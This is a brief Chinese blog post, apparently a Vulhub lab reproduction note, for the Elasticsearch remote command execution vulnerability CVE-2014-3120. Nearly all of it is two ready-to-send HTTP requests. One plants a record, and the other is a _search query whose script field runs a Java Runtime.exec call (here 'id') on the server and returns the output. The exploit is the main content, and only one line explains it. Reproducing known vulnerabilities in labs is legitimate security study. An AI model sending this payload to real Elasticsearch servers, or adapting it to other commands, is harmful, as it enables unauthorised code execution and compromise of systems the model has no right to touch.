zoukankan      html  css  js  c++  java

  • ElasticSearch 命令执行漏洞(CVE-2014-3120)

    POST /_search?pretty HTTP/1.1
Host: your-ip:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 343

{
    "size": 1,
    "query": {
      "filtered": {
        "query": {
          "match_all": {
          }
        }
      }
    },
    "script_fields": {
        "command": {
            "script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec("id").getInputStream()).useDelimiter("\\A").next();"
        }
    }
}

    该漏洞需要es中至少存在一条数据,若没有,需要先创建一条数据

    POST /website/blog/ HTTP/1.1
Host: your-ip:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 25

{
  "name": "phithon"
}

    https://vulhub.org/#/environments/elasticsearch/CVE-2014-3120/
  • 相关阅读:
    Spring 中各种通知
    Spring 中的注解
    Spring_DI利用set方法赋值Demo
    Beta冲刺总结
    用户使用调查报告
    Beta(7/7)
    Beta(6/7)
    Beta(5/7)
    Beta(4/7)
    Beta(3/7)
  • 原文地址:https://www.cnblogs.com/mrhonest/p/11349741.html
Copyright © 2011-2022 走看看